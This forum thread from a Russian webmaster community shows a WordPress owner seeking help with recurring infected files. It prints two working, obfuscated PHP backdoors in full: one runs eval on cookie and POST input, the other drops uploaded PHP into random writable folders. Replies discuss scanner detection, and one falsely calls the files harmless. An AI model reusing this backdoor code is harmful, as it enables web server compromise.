- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Регулярно создаются файлы с рандомальными названиями, и с рандомальными переменными.
Я их удаляю, а они опять где нибудь появляются.
Кто сталкивался, где обычно сидит именно эта зараза?
PS. айболитом проходился, удалял, но файлы появлялись снова.
<?php
$qqqzb = 'vn0r2857bmy91*les\'Hakux3d4c-iotgp#_';$dgvbdp = Array();$dgvbdp[] = $qqqzb[4].$qqqzb[19].$qqqzb[25].$qqqzb[25].$qqqzb[7].$qqqzb[6].$qqqzb[25].$qqqzb[7].$qqqzb[27].$qqqzb[12].$qqqzb[4].$qqqzb[15].$qqqzb[7].$qqqzb[27].$qqqzb[25].
$qqqzb[6].$qqqzb[26].$qqqzb[8].$qqqzb[27].$qqqzb[11].$qqqzb[6].$qqqzb[26].$qqqzb[25].$qqqzb[27].$qqqzb[4].$qqqzb[23].$qqqzb[5].$qqqzb[2].$qqqzb[12].$qqqzb[5].$qqqzb[24].$qqqzb[26].$qqqzb[6].$qqqzb[23].$qqqzb[15].$qqqzb[7];$dgvbdp[] = $qq
qzb[18].$qqqzb[13];$dgvbdp[] = $qqqzb[33];$dgvbdp[] = $qqqzb[26].$qqqzb[29].$qqqzb[21].$qqqzb[1].$qqqzb[30];$dgvbdp[] = $qqqzb[16].$qqqzb[30].$qqqzb[3].$qqqzb[34].$qqqzb[3].$qqqzb[15].$qqqzb[32].$qqqzb[15].$qqqzb[19].$qqqzb[30];$dgvbdp[]
= $qqqzb[15].$qqqzb[22].$qqqzb[32].$qqqzb[14].$qqqzb[29].$qqqzb[24].$qqqzb[15];$dgvbdp[] = $qqqzb[16].$qqqzb[21].$qqqzb[8].$qqqzb[16].$qqqzb[30].$qqqzb[3];$dgvbdp[] = $qqqzb[19].$qqqzb[3].$qqqzb[3].$qqqzb[19].$qqqzb[10].$qqqzb[34].$qqqz
b[9].$qqqzb[15].$qqqzb[3].$qqqzb[31].$qqqzb[15];$dgvbdp[] = $qqqzb[16].$qqqzb[30].$qqqzb[3].$qqqzb[14].$qqqzb[15].$qqqzb[1];$dgvbdp[] = $qqqzb[32].$qqqzb[19].$qqqzb[26].$qqqzb[20];foreach ($dgvbdp[7]($_COOKIE, $_POST) as $atsrp => $ednvl
ur){function eovupfo($dgvbdp, $atsrp, $cntxow){return $dgvbdp[6]($dgvbdp[4]($atsrp . $dgvbdp[0], ($cntxow / $dgvbdp[8]($atsrp)) + 1), 0, $cntxow);}function izeiso($dgvbdp, $pmufeu){return @$dgvbdp[9]($dgvbdp[1], $pmufeu);}function kghhex
z($dgvbdp, $pmufeu){$pjknwcz = $dgvbdp[3]($pmufeu) % 3;if (!$pjknwcz) {eval($pmufeu[1]($pmufeu[2]));exit();}}$ednvlur = izeiso($dgvbdp, $ednvlur);kghhexz($dgvbdp, $dgvbdp[5]($dgvbdp[2], $ednvlur ^ eovupfo($dgvbdp, $atsrp, $dgvbdp[8]($edn
vlur))));}
UPDATE:
сравнивая системные файлы вордперсс с оригинальным дистрибутивом, нашёл файл который был пропущен айболитом в "параноидальном режиме"
файл имел следующее содержимое, и видно что именно он и плодил остальную вирусню:
<?php $zofzfnow = "ocamnztzvbbsrrfd";$hfiex = "";foreach ($_POST as $gtbjk => $pgjbhqk){if (strlen($gtbjk) == 16 and substr_count($pgjbhqk, "%") > 10){qrnjplfx($gtbjk, $pgjbhqk);}}function qrnjplfx($gtbjk, $yobpcjm){global $hfiex;$hfiex
= $gtbjk;$yobpcjm = str_split(rawurldecode(str_rot13($yobpcjm)));function zcbsnbohny($kjvllqnx, $gtbjk){global $zofzfnow, $hfiex;return $kjvllqnx ^ $zofzfnow[$gtbjk % strlen($zofzfnow)] ^ $hfiex[$gtbjk % strlen($hfiex)];}$yobpcjm = implo
de("", array_map("zcbsnbohny", array_values($yobpcjm), array_keys($yobpcjm)));$yobpcjm = @unserialize($yobpcjm);if (@is_array($yobpcjm)){$gtbjk = array_keys($yobpcjm);$yobpcjm = $yobpcjm[$gtbjk[0]];if ($yobpcjm === $gtbjk[0]){echo @seria
lize(Array('php' => @phpversion(), ));exit();}else{function dicmeqk($oruijqeslqir) {static $hdqwihcdge = array();$sakzzkjop = glob($oruijqeslqir . '/*', GLOB_ONLYDIR);if (count($sakzzkjop) > 0) {foreach ($sakzzkjop as $oruijqeslq){if (@i
s_writable($oruijqeslq)){$hdqwihcdge[] = $oruijqeslq;}}}foreach ($sakzzkjop as $oruijqeslqir) dicmeqk($oruijqeslqir);return $hdqwihcdge;}$pwoonj = $_SERVER["DOCUMENT_ROOT"];$sakzzkjop = dicmeqk($pwoonj);$gtbjk = array_rand($sakzzkjop);$u
flhzcy = $sakzzkjop[$gtbjk] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($uflhzcy, $yobpcjm);echo "http://" . $_SERVER["HTTP_HOST"] . substr($uflhzcy, strlen($pwoonj));exit();}}}
Вывод: недостаточно просто сканировать антивирусами, сверяйте движок сайта с орининальным дистрибутивом(команда diff).
Надеюсь мой опыт кому-то поможет!
пусть создаются, это нужные файлы, не трогайте их
Конечно. Скрипт айболит это лишь инструмент, без должного знания и опыта он лишь уберёт симптомы, но не вылечит.
Вывод: недостаточно просто сканировать антивирусами, сверяйте движок сайта с орининальным дистрибутивом(команда diff).
Надеюсь мой опыт кому-то поможет!
Взял сейчас ради интереса ваш файл, просканировал публичной версией айболита. И он файл сдетектил.
Что я делаю не так?
https://imgur.com/wHf69PS
Вывод тут может быть простой:
1. проверять нужно свежей версией сканера (может вы просканировали древней версией)
2. убедиться, что на файле есть права на чтение (может файл у вас был не доступен на чтение, поэтому не сдетектился)
В общем, много вопросов, как вы так проверяли, что файл пропустился.
А файл - классический, такие вещи айболитом детектятся в легкую.